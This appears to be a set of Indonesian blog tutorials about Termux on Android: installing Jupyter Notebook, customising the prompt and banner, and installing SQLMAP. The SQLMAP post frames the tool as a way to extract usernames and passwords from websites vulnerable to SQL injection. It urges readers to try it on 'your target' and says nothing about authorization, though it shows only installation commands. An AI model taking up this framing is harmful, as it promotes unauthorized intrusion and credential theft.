Untuk melakukan upgrade pip, ketikan perintah seperti berikut ini.

$ pip install --upgrade pip

Gunanya untuk memutakhirkan pip yang terbaru.

Langkah 2 - Cara Install Jupyter Notebook


Akhirnya kita sudah pada tahap proses installasi jupyter notebook, buka termux kamu dan ketikan perintah berikut ini.

$ pkg install libzmq libcrypt clang
$ pip install pyzmq --install-option="--zmq=/usr/lib"

Nah jika sudah semuanya selesai, selanjutnya ketikan perintah berikut ini pada terminal termux kamu untuk mengunduh jupyter notebook.

$ pip install jupyter

Tunggu proses installasi sampai selesai, biasanya agak lama sih pastikan koneksi internet kamu stabil ya, sabar aja.

Nah, sampai sini sudah hampir selesai. Sekarang saya akan memberikan tips cara menggunakanya, oke simak aja dibawah ini.

Berikut Cara Menggunakan Jupyter Notebook


Jika sudah terinstall semestinya, untuk cara menjalankan Jupyter Notebook cukup mudah, ketikan perintah seperti berikut ini pada terminal Termux kamu.

$ jupyter notebook

Ketika di tekan enter maka tampilannya akan seperti pada gambar ini,

Cara menjalankan jupyter notebook

Pada output terminal termux tersebut Jupyter Notebook diakses melalui browser, disitu terdapat pilihan untuk akses url pilih salah satu aja sesuai keinginan kamu. Biar tidak ribet caranya seperti ini, tahan beberapa detik pada layar termux > pilih MORE... > Select URL tinggal klik url aja.

Nah, contoh disini saya memilih url yang http://localhost:8888/tree kemudian buka pada browser kamu dan pastekan url yang kamu salin tadi, lalu tekan enter.

Jadi nanti pada halaman Jupyter Notebook akan muncul dilokasi folder dimana kita menjalankan syntaks/perintah jupyter notebook, kira-kira seperti ini.

Tampilan jupyter notebook di android

Membuat Notebook:
Untuk membuat notebook dengan python, kamu bisa memilih New > klik Python 3.

Buat file python

Setelah kamu klik pada tombol Python 3, nanti kamu akan diarahkan/dibawa ke new tab. Kira-kira tampilanya akan seperti berikut ini.

Menjalankan jupyter notebook android

Lalu pada contoh ini, saya tuliskan kode seperti berikut ini.

Menulis kode pada jupyter notebook

Kemudian untuk menjalankan/melihat hasil outputnya, klik pada bagian tanda kurang lebih seperti ini >| pada bagian Cell sebelah kanan.

Menjalankan kode di jupyter notebook

Untuk menambah cell dibawah cell aktif, klik pada bagian tombol tambah + lihat gambar dibawah.

Menambahkan cells baru pada jupyter notebook

Cell?
Cell merupakan area untuk menaruh/menulis kode di Jupyter Notebook.

Selesai deh, gimana menurutmu? Mudahkan? Silahkan untuk mencoba sendiri daripada penasaran.

Oiyaa, hampir lupa wkwkk.
Cara untuk keluar/stop dari notebook, kamu bisa tekan CTRL+C pada terminal Termux kamu, nanti akan muncul pertanyaan seperti ini "Shutdown this notebook server" ketik huruf y aja lalu enter untuk konfirmasi, pahamkan? Oke sip.

Yasudah seperti biasanya, jika ada yang mau ditanyakan silahkan tulis dibagian kolom komentar, nanti sebisa mungkin akan bantu jawab.

Bagikan artikel ini jika dirasa sangat bermanfaat, biar teman-teman yang lainya juga tahu dan bisa mempraktekan lalu bisa belajar ngoding python kapanpun dan dimanapun, mantap sharing is caring.

Demikian artikel pada kali ini, tentang Cara Install Jupyter Notebook: Python IDE di Android | Termux mudah-mudahan apa yang saya tulis ini dapat bermanfaat dan dapat membantu kamu. Maaf apabila ada salah dalam penulisanya ya.

Sekian, salam, terimakasih. Enjoy!

Cara Merubah Tampilan Prompt di Termux

By On 8:36:00 AM


Melalui artikel kali ini, saya ingin sharing tentang bagaimana cara merubah tampilan di termux, tujuan saya menulis tentang hal ini, buat berbagi pengalaman dan tentunya agar terminal termux kamu jadi lebih keren saat digunakan.

Sebelum ke tutorial selanjutnya, kamu sudah ngerti apa sih yang dimaksud dengan prompt? Belum tahu ya, baik disini saya akan menjelaskan berdasarkan opini saya.

Jadi, prompt itu seperti ini.
Buat kamu yang sering bermain terminal di Linux, kalian pasti sudah tidak asing lagi dengan tanda seperti ini root@hostname:~# atau user@hostname:~# nah jadi itulah yang dimaksud "prompt" sangat sederhana kan penjelasanya, maaf kalau kurang lengkap.


Kalo di Linux bisa berupa tanda $ atau #, kalo di Windows biasanya berupa tanda C:\>, sedangkan kalo di Termux biasanya tampilan prompt defaultnya seperti tanda $ ini, biasanya orang nyebutnya dollar.

Kira-kira, tampilan prompt saya seperti ini setelah saya ubah tampilan prompt di bagian termuxnya, sederhana dan elegan wkwk.

Ubah Prompt di Termux

Kamu bisa juga membuatnya loh, agar tampilan prompt kamu kelihatan lebih keren gak cuma tanda dollar itu-itu aja.

Nah mungkin, kamu sudah penasaran kan ya, lalu bagaimana caranya? Oke, mari kita simak ulasan berikut ini.

Tutorial Cara Merubah Tampilan Prompt di Termux

Yang pertama install nano, caranya buka termux kalian ketikan pkg install nano lalu enter tunggu samapai prosesnya selesai.

Setelah selesai, baru kemudian ketikan perintah seperti ini di termux kalian "nano ../usr/etc/bash.bashrc" kemudian nanti akan muncul semacam text editor gitu.

Selanjutnya cari line kode seperti berikut PS1='$' bisa manual atau find words biasanya Ctrl+F pada leafpad dan sejenisya.
Lalu komentari kode tersebut dengan tanda # di bagian depan kode, jadi akan seperti ini # PS1="$"

Cara selanjutnya, kita akan membuat nilai variabel baru untuk PS1. Misalkan saya beri nilai variabel PS1 dengan tanda "===>" jadi kalo digabunggkan kodenya seperti ini PS1="===>" kemudian save dengan cara tekan ctrl+x kemudian tekan y.

Maka hasilnya ketika kalian membuka termux tampilan prompt akan menjadi seperti ini ===>

Jadi, sampai disini apakah masih binggung? Bagus kalo tidak binggung, mari kembali ke topik pembahasan.

Jadi PS1 ini adalah variabel yang menyimpan nilai tampilan dari command prompt. Nah untuk itu kita bisa memasukan nilai lainya selain contoh diatas. Contoh lainya seperti berikut ini,
PS1="\u@\h \w '
Kemudian save, kalo di saya ketika buka tab baru maka hasilnya seperti ini tampilanya u0_a132@localhost ~

Kalian juga bisa menambahkan warna, misal saya kasih warna hijau \e[0;92m dan putih \e[1;37m terus pengenya yang hijau didepan yang putih di belakang, bisa kok jadi kodenya akan seperti ini,
PS1="\e[0;92m\u@\h \w\e[1;37m'
Tinggal disave buka tab baru dan lihat hasilnya.

Buat kalian yang belum jelas dengan beberapa kode diatas, saya sudah menyediakan keteranganya berikut ini:

Escape Squence

d : Waktu saat ini HH:MM:SS
     Tanggal saat ini
\n : Baris Baru
\t : Tab baru
s : Environment shell
W : Directory
w : Directory full path
u : Nama user
h : Nama hostname
# : Jumlah perintah yang dimasukan
$ : Jika UID adalah 0 (root) maka prompt #, jika tidak maka $

Colors

Warna Nilai
black='\e[0;30m'
blue='\e[0;34m'
green='\e[0;32m'
cyan='\e[0;36m'
red='\e[0;31m'
purple='\e[0;35m'
brown='\e[0;33m'
lightgray='\e[0;37m'
darkgray='\e[1;30m'
lightblue='\e[1;34m'
lightgreen='\e[1;32m'
lightcyan='\e[1;36m'
lightred='\e[1;31m'
lightpurple='\e[1;35m'
yellow='\e[1;33m'
white='\e[1;37m'
nc='\e[0m'

Gimana mudahkan? Silahkan kamu kreasikan sesuai keinginan masing-masing. Selamat mencoba.

Eh iyaa, jika dirasa kamu masih binggung atau tidak paham, silahkan tuliskan dikolom komentar yang sudah di sediakan ya. Dengan senang hati saya akan bantu jawab sesuai kemampuan saya. Maaf kalau ada salah kata.

Demikian artikel sederhana saya kali ini, tentang cara merubah tampilan prompt di termux agar supaya menjadi keren saat digunakan.

Terimakasih, enjoy!

Cara Mempercantik Tampilan Termux

By On 9:14:00 PM

Mempercantik Tampilan Termux

Halo, Apa kabar?

Melalui artikel kali ini, saya ingin berbagi tips tentang termux, yaitu tentang cara mempercantik tampilan termux biar lebih keren dan bagus.

Oiya, buat kamu yang sering menggunakan aplikasi termux ini pasti kalian lama kelamaan akan bosan dengan tampilan termux yang hanya berwana hitam dan putih ya pokoknya itu-itu saja, yakan? Saya mikirnya juga gitu.

Berbeda dengan yang tampilan termux yang sudah dimodifikasi sedemikian rupa sesuai selera, pastinya lebih kelihatan keren dipandang mata ketika akan digunakan.

Nah oke, kalu begitu daripada kamu penasaran seperti apa sih caranya. Mari kita simak tutorial berikut ini:

Mempercantik Tampilan Termux

Buat yang mau update dan upgrade ditermuxnya biar tidak mau ketinggalan yang terbaru bisa ketikan perintah seperti berikut ini,

$ apt update && apt upgrade

Untuk merubah tampilan termux menjadi keren, sebenarnya kita perlu install beberapa package di termux terlebih dahulu. Package ya kita perlukan contoh misalnya ada Cowsay, Figlet, Nano dan lain sebagainya.

Jadi kira-kira perintah untuk cara install package di termux akan seperti berikut ini:

$ pkg install ruby
$ pkg install nano
$ pkg install cowsay
$ pkg install figlet
$ pkg install toilet
$ gem install lolcat

Oke, jika sudah memenuhi atau sudah selesai proses installasinya, selanjutnya kamu bisa ikuti perintah berikut ini, ketikan saja di terminal termux kamu.

$ nano /data/data/com.termux/files/usr/etc/profile

Selanjutnya, nanti akan muncul tampilan text editor yang nantinya digunakan untuk keperluan mengedit kode.

Nah, habis itu kamu bisa memasukan kode termux yang sudah saya siapkan, ingat ya untuk memasukan/tempelkan kodenya letakan dibagian line paling bawah. Berikut ini kode termunya:

Kode Termux

clear
cowsay -f eyes "Sleman Hacker" | lolcat
toilet -f standard "gudwadowlsky" -F gay
date | lolcat

Catatan

Tulisan "Sleman Hacker" dan "gudwadowlsky" bisa kamu ganti sesuai apa yang kamu mau, bebas kok.

Oiya, jika kamu masih binggung untuk cara memasukan kode termuxnya, bisa kamu lihat pada gambar contoh dibawah ini ya.

Kode Termux Keren

Habis itu, kemudian tinggal kamu save dan lihatlah hasilnya, maka tampilan termux online kamu menjadi keren, mantap bukan? Hehe.

Nah, terkadang ada juga yang masih binggung, gimana sih cara ngesavenya? Oke saya akan jelaskan berikut ini.

Cara save kode termux:

Tekan CTRL+X kemudian ketikan huruf Y lalu enter.

Bang kalau gak ada tombol CTRL ditermux gimana? Nah, jika di terminal termux kamu tidak ada seperti yang sudah saya sebutkan, kamu bisa lakukan seperti berikut ini:

Tekan tombol volume bawah+x kemudian ketikan huruf Y lalu enter.

Sampai sini sudah paham? Bagus hehe.
Jika tidak terjadi error atau masalah lainya, untuk melihat hasilnya, kamu bisa buka pada tab baru atau new session pada terminal termux kamu, simpel kan.

Catatan penting buat kamu:

1. Perintah "cowsay -l" kegunaanya untuk melihat daftar-daftar tampilan cowsay yang nantinya bisa dipakai untuk merubah tampilan termux. Kalian bisa lihat contoh pada gambar ini.

Cowsay tampilan termux

2. Perintah "showfigfonts" kegunaanya untuk melihat daftar-daftar font difiglet dan disitu nanti ada demo text berbentuk ASCII sesuai jenis fontnya. Saya akan kasih lihat gambarnya seperti ini.

Fonts termux keren

Gimana menurutmu? Mudahkan hehe.
Ya kira-kira begitulah cara mempercantik tampilan termux android dari tulisan sederhana saya ini, tutorial termux ini bisa kamu coba sendiri, tentunya biar terminal termux kamu lebih keren, dan tidak membosankan hehe.

Akhirnya, Saya ingin mengucapkan terimakasih kepada teman-teman semua yang telah meluangkan waktunya untuk membaca artikel ini, Semoga berguna dan bermanfaat buat teman-teman semua.

Saya juga sangat menghargai pendapat kamu tentang artikel ini, bagi kamu yang ingin memberi kritik atau mungkin sekedar bertanya mengenai hal ini, kamu bisa tuliskan dikolom komentar yang sudah disediakan dibawah, enjoy.

Makasih, Selamat mencoba!

Cara Mudah Install SQLMAP di Termux Sekaligus Tips Cara Menggunakannya

By On 1:28:00 AM


Hi, Apakabar?

Oke melalui artikel kali ini, saya ingin memberikan sebuah tutorial bagaimana cara install SQLMAP di Termux dan sekaligus saya ingin sharing cara menggunakan SQLMAP untuk keperluan hacking contohnya mendaptakan username dan password melalui teknik SQL Injection.

Install Tools SQLMAP Termux Android

Oiya, sebelum membahas ke tutorial selanjutnya saya ingin memberikan sedikit penjelasan tentang apa itu SQLMAP serta apa kegunaan dari tools SQLMAP tersebut, penasarankan? Mari kita simak berikut ini...

Apa Itu SQLMAP?


SQLMAP adalah sebuah script eksploitasi yang ditulis dengan bahasa pemrograman Python, dimana cara kerja tools slqmap ini yakni dapat melakukan eksploitasi terhadap situs website yang memiliki bug atau celah terhadap serangan SQL Injection.

Untuk kegunaanya? Yang jelas dengan menggunakan tools SQLMAP tersebut kita bisa mendapatkan data seperti username, password dsb dari website yang memiliki celah/bug/vuln terhadap SQL Injection secara otomatis, maksud dari otomatis tersebut hanya dengan melakukan beberapa perintah sesuai yang ada pada tools SQLMAP tersebut.

Nah, itulah penjelasan sederhana tentang tools SQLMAP, sekarang selanjutnya mari kita simak untuk cara install dan lain sebagainya.

Tutorial Cara Install SQLMAP Dengan Termux


INFO: Pada tutorial ini saya menggunakan Python versi 3 bukan Python yang versi 2 karena terdengar kabar bahwa pada Python 2 sudah tidak lagi mendapat support dari pihak pengembang dan mereka menyarankan untuk migrasi ke versi Python 3.

Bahan:
1. Aplikasi Termux
2. Python

Jika kamu belum punya Termux silahkan kamu install terlebih dahulu, untuk dwonloadnya bisa melalui PlayStore kemudian tulis pada kolom pencarian dengan keyword "termux".

Kemudian buka terminal termux kamu lalu lakukan installasi beberapa package berikut ini ya, supaya tidak terjadi error dan berikut ini perintahnya.

$ pkg install python
$ pkg install git

Sudah selesai installnya? Oke, jika sudah selanjutnya download/cloning script SQLMAP tersebut dari github terlebih dahulu dengan cara seperti berikut ini.

$ git clone https://github.com/sqlmapproject/sqlmap.git

Berikutnya setelah proses download/cloning tadi selesai, sekarang lanjut masuk kedalam directory SQLMAP tersebut dengan menuliskan perintah berikut ini.

$ cd  sqlmap

Sudahkan? Langkah selanjutnya untuk kamu yang ingin menjalankan tools sqlmap ini silahkan ikuti perintah berikut ini dan ketikan pada terminal termux kamu.

$ python sqlmap.py

Kemudian habis itu kamu tekan enter, jika tidak terjadi error maka kira-kira tampilan dari SQLMAP akan seperti pada gambar berikut ini.

Sukses install tools sqlmap di termux

Oke selamat ya, jika kamu mengikuti step by step cara tersebut berarti kamu sudah berhasil install tools sqlmap di termux android.

Selanjutnya saya akan memberikan tips cara menggunakanya, simak!

Tips Cara Menggunakan SQLMAP di Termux Android


Tujuan kamu menggunakan tools sqlmap buat apa hayo? Wkwkkk.

Nah, baiklah untuk cara menggunakan tools sqlmap ini, sebelumnya saya sudah membagikan artikel tentang hal ini. Jadi untuk mempersingkat waktu dan tidak terlalu panjang kamu bisa baca artikel referensi di blogg saya ini.

Berikut Tutorialnya: Cara Menggunakan Tools SQLMAP

Silahkan kamu pahami cara-cara tersebut, kemudian aplikasikan pada target kamu jadikan sebagai bahan buat pembelajaran aja buat nambah ilmu.

Yasudah, buat yang tidak punya pc/laptop tapi pengen banget install tools sqlmap ya inilah artikel ini ditulis sebagai referensi media belajar hacking seperti sql injection dan lain sebagainya melalui termux.

Tapi, seberapa efektifkah termux ini dalam hal hacking? Kurang paham sih soal hal ini, mungkin jika diganti dengan pertanyaan "Apakah termux efektif sama Linux" mungkin bisa dibilang iya tapi harus di rooting dulu androidnya wkwkk.

Wah kalau menurut saya sayang sih, entar malah garansi hp melayang duh wkwkk.

Oke-oke cukup sekian dari artikel kali ini, yang mana penjelasan tadi dimulai dari tentang Cara Install SQLMAP di Termux sekaligus dengan penjelasan sederhana Cara Menggunakan Tools SQLMAP di Termux Android tersebut semoga bermanfaat buat kalian semua.

Nah, jika ada yang kamu belum pahami dari penjelasan tersebut silahkan tinggalkan komentar dibawah ini, sebisa mungkin akan saya bantu jawab.

Sekian, Terimakasih untuk waktunya. Enjoy!

CARA MEMBUAT TEXT ANIMATION (TEKS ANIMASI) DI ADOBE AFTER EFFECT

By On 4:44:00 AM


Cnnteknologi.net - Hallo, Apa kabar omnivora ? sudah makan belom ? :D. Kali ini admin akan memberikan video tutorial bagaimana cara membuat teks animasi menggunakan software adobe after effect. Animasi teks umumnya digunakan dalam pembukaan (opening) pada suatu video, mendeskripsikan sesuatu maupun untuk ending video. 

Sebelumnya kalian harus menginstall Adobe After Effect. Bisa kalian download di link berikut :

Berikut ini merupakan kumpulan beberapa video tutorial membuat text animasi di adobe after effect:

Contact Form

Name

Email *

Message *